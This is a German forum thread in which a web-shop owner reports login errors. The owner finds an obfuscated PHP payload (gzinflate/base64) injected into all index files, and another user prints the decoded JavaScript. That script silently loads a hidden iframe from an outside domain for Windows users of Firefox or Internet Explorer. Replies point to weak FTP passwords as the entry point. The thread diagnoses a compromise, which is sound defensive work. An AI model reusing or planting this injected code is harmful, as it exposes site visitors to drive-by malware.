Hallo zusammen, ich hab längere Zeit nichts mehr am Shop gemacht. Als ich mich heute einloggen wollte, kommt folgende Fehlermeldung und ich komm nicht mehr rein: WARNING(2): "Cannot modify header information - headers already sent by (output started at /kunden/300443_52064/webseiten/includes/classes/main.php:162)" in /kunden/300443_52064/webseiten/includes/application_top.php:901 (Details) WARNING(2): "session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /kunden/300443_52064/webseiten/includes/classes/main.php:162)" in /kunden/300443_52064/webseiten/includes/functions/sessions.php:76 (Details) WARNING(2): "session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /kunden/300443_52064/webseiten/includes/classes/main.php:162)" in /kunden/300443_52064/webseiten/includes/functions/sessions.php:76 (Details) WARNING(2): "Cannot modify header information - headers already sent by (output started at /kunden/300443_52064/webseiten/includes/classes/main.php:162)" in /kunden/300443_52064/webseiten/inc/xtc_redirect.inc.php:44 (Details) Was ist da los ? Kann jemand helfen ? Grüsse Ghazii
Was grad noch aufgefallen ist: Laut Datum sollen alle index-Dateien an einem bestimmten Tag geändert worden sein, was ich allerdings nicht war. Jede Inde enthält nun am Anganf folgenden zusätzlich Code: #bbfd9f# echo(gzinflate(base64_decode("fVNNb9swDD3nX3A+1Daa2Um70xwFGLAP7JDt0AHFToFj07a2RDIkOsmw5b+Xkow0SLdZgGCQfI98JLWwlZE9Af3qUUSER8p/lPsyWKNlM6iKpFbQIq0rrX9KTL6UO0zh92RfGrBYmqoDAc4ItxCJqPAOgzQYtS+3A7I3YqtsIKl1NexQURaosi2qljpYwswRTnTTWCSOv46Tqsbj1yYJ6dJi4tnG8FcCXs8ZD5Mzw60YKxszMGCCqv4Pc1REUwhoR+/5PcKT/xP+TH8hWAwKbVX2+EKvHTaWjFTtWPsUmDZ1CU98AsVl64rTeQD2eQCKez0FH+Bk8+c6Xh3rklyzFR7gPf8maeF8wZ4x/ju3JLmb3b25dqy0oi65vzZ7ktF6pcSlCROPRcz3qHesia0FHntp0HrvSEn60+rbQ9AfgvqSOpHHxckJ2Ji1wZaZ8+QjQxt9/LN6+PwhzWXh3IM1a2194r1sS9ImGyyady1XVcgmudjQmHTfYz30ceoGGMdwczPis11JVZfkjzx4fbC5TF/4Qh2p28iz6oOR3It4IRvjZPt7o02NRsygQ9l2JOZwkDXrmQO/Hr3dskyhNFhTiagj6t/meb3fWd1QhkPuFy/raLeNlrDIA/Ey5l2wfxMyhXg+84dDTos8PNDlEw=="))); #/bbfd9f# Ist das ein Hack ?
Ja und der Inhalt: Code: <script type="text/javascript">function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://dvmsoft.eu/index.html"> </iframe>'); set_cookie('toppedup', '1010101');}</script>
...da frage ich mich doch, wer so einfach deine index Dateien geändert haben kann...?!? Stimmen deine Dateirechte denn überhaupt?
Vor 3 Wochen nen Kunden mit einem WordPress-Blog gehabt, bei dem war das so ähnlich. Er hatte ein ziemlich einfaches FTP-Passwort gewählt. Ein Angreifer hatte sich per Brute-Force Zugriff zum System verschafft. An den Log-Dateien konnte man das ganz gut verfolgen. Es muss nicht unbedingt an GX2 liegen.